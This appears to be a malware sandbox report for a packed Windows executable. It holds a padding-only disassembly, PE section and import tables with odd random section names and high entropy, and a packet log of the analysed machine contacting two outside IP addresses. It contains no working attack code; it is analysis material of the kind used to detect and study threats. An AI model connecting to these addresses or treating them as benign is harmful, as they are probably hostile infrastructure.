add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x72b05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x72a000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6fad0	0x10	krimtaup
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6fa80	0x18	krimtaup
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x729000	0x283400	e1f3a13451a251a26186c3ba537b1732	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x72a000	0x2b0	0x200	b9d374ad26796be29c8f5decbb045382	False	0.798828125	data	6.0112624729266155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x72b000	0x1000	0x200	d6de82d14e357527731a70b0d9d5c0e8	False	0.166015625	data	1.1589685166080708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x72c000	0x38b000	0x200	966b6ebc73be61fcb306c27a3c75e8ef	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
krimtaup	0xab7000	0x1b9000	0x1b8e00	6fa012a190373abb4cd3976b21840c3f	False	0.9942812810107741	data	7.9553189741670245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xiywmuay	0xc70000	0x1000	0x400	0a1c2cf86111f679e38a50548753fb27	False	0.814453125	data	6.39340330086352	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xc71000	0x3000	0x2200	a8b32a6ef19c58fe34574abab55f5b90	False	0.08697150735294118	DOS executable (COM)	1.0428723190070666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc6fae0	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:13:04.119194984 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:04.119250059 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:04.119326115 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:04.137092113 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:04.137113094 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.905143976 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.906086922 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:05.906102896 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.907619953 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.908144951 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:05.909184933 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:05.909255028 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.920196056 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:05.920205116 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:05.972187042 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:06.243484974 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:06.243701935 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:06.243787050 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:06.252329111 CET	49714	443	192.168.2.5	98.85.100.80
Dec 20, 2024 16:13:06.252355099 CET	443	49714	98.85.100.80	192.168.2.5
Dec 20, 2024 16:13:07.313868999 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.433609962 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.433741093 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.465867996 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.586090088 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586107016 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586246967 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586265087 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586278915 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586323977 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.586389065 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.586396933 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586416960 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586430073 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586441994 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.586443901 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586486101 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.586551905 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.586607933 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.706099987 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706136942 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706168890 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706224918 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.706267118 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.706289053 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706304073 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706336021 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.706350088 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.706382036 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.706423044 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.752947092 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.753067970 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.868722916 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:07.868815899 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:07.920917034 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.036760092 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.036823034 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.236596107 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.236671925 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.432096958 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.432297945 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.432396889 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552088022 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552122116 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552135944 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552148104 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552162886 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552165031 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552216053 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552251101 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552285910 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552298069 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552336931 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552476883 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552490950 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.552521944 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.552546024 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.554976940 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.555083036 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.555412054 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.671932936 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.671957016 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.671976089 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.671992064 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.672004938 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.672040939 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.672127962 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.672159910 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.672204018 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.672344923 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.672430992 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.672451973 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.672523022 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.673494101 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.674750090 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.674782038 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.674881935 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.674907923 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675054073 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675088882 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675195932 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675220966 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675302029 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675323963 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675339937 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675457001 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675471067 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675484896 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675497055 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675538063 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675549984 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675561905 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675576925 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675635099 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675647020 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675662041 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675685883 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.675719976 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675733089 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675740957 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.675789118 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675817013 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675828934 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675841093 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.675940037 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676004887 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676018953 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676071882 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676084995 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676098108 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676189899 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676203012 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676214933 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676237106 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676388979 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676403046 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676422119 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676460028 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676472902 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676659107 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.676795959 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.791819096 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.791873932 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.791980028 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792030096 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792130947 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792273045 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792296886 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792309999 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792390108 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792402983 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792460918 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792473078 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792648077 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792664051 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792676926 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792746067 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792757988 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792769909 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.792861938 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.793179989 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.793284893 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.795351982 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795380116 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795423985 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795557022 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795569897 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795584917 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795655966 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795671940 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795698881 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795711994 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795748949 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795761108 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795773029 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795794964 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795806885 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795897961 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795933008 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795945883 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795958996 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795973063 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.795985937 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796103954 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796117067 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796142101 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796154022 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796166897 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796260118 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796272039 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796302080 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796314955 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796431065 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796483994 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796495914 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796509027 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796550035 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796618938 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796633005 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796644926 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796745062 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796757936 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796772957 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796785116 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796837091 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796869993 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.796885014 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797111988 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797126055 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797137022 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797234058 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797246933 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797260046 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797272921 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797370911 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797637939 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.797987938 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.798042059 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.912945986 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.912978888 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913033009 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913047075 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913109064 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913142920 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913156033 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913167953 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913183928 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913207054 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913219929 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913244963 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913256884 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913273096 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913369894 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913382053 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913409948 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913427114 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913475990 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913491964 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913505077 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913518906 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913603067 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913649082 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913800955 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913829088 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913846016 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913860083 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913919926 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913966894 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913984060 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.913997889 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914098978 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914115906 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914170980 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914185047 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914247036 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914263010 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914275885 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914360046 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914372921 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914385080 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914427996 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914441109 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914463997 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914518118 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914591074 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914603949 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914665937 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914679050 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914725065 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914748907 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.914764881 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.915185928 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.915534973 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.915640116 CET	49720	80	192.168.2.5	185.121.15.192
Dec 20, 2024 16:13:08.917835951 CET	80	49720	185.121.15.192	192.168.2.5
Dec 20, 2024 16:13:08.917886019 CET	80	49720	185.121.15.192	192.168.2.5
